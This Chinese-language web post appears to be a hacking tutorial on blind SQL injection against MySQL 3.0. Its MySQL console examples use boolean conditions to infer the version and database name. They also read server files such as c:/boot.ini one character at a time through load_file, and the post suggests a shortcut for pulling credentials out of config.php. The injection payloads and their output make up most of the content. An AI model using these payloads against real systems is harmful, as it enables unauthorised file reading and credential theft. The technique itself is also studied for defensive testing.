关于mysql 3.0的注射的一点思路

所属分类：实用技巧 / 漏洞研究阅读数： 1645

收藏 0赞 0分享

mysql 3.0的注射

对mysql的注射主要是靠union 的联合查询，但union只对版本4。0以上的有用，对3。0以下的就没用了。。。。。。。。。。

所以在mysql 3.0的数据库里没办法使用union进行跨表查询，但可以使用load_file
但是也不可以直接使用union替换出来。下面就是我的一点思路：

得到版本：
mysql> select * from user where userid=1 and length(version())<10;
Empty set (0.00 sec)

mysql> select * from user where userid=1 and length(version())<1777;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)

得到当前数据库：
mysql> select * from user where userid=1 and length(database())>0;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)

暴取文件代码：
mysql> select * from user where userid=1 and ascii(mid(load_file('c:/boot.ini'),1,1))<1;
Empty set (0.05 sec)

mysql> select * from user where userid=1 and ascii(mid(load_file('c:/boot.ini'),1,1))>1;
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)

因为工作量大，可以用程序来实现（不过也很麻烦）
另外思路：可以先使用字符处理函数得到"特殊字符的位置"，如我们暴的是config.php文件我们就可以选取"localhost"（或其他）为特殊字符，先得到所在的位置（在哪个字节），在去猜它附近的，这样可以省去不少工作量。

更多精彩内容其他人还在看

关于mysql 3.0的注射的一点思路

MySQL Proxy（解决注入的另一思路）

phpwind管理权限泄露漏洞利用程序发布

分析NtGodMode.exe干了什么

伯乐asp收信程序漏洞及利用程序利用代码

字符集导致的浏览器跨站脚本攻击分析

Search Engine XSS Worm

CPU也有远程攻击漏洞英特尔匆匆修补

暂时屏蔽 IE 最新 0day的4 种方法

Sql Server 应用程序的高级Sql注入第1/2页

ASP木马后门新思路

网络赚钱

站长故事

关于mysql 3.0的注射的一点思路

MySQL Proxy（解决注入的另一思路）

phpwind管理权限泄露漏洞利用程序发布

分析NtGodMode.exe干了什么

伯乐asp收信程序漏洞及利用程序利用代码

字符集导致的浏览器跨站脚本攻击分析

Search Engine XSS Worm

CPU也有远程攻击漏洞 英特尔匆匆修补

暂时屏蔽 IE 最新 0day的4 种方法

Sql Server 应用程序的高级Sql注入第1/2页

ASP木马后门新思路

网络赚钱

站长故事

CPU也有远程攻击漏洞英特尔匆匆修补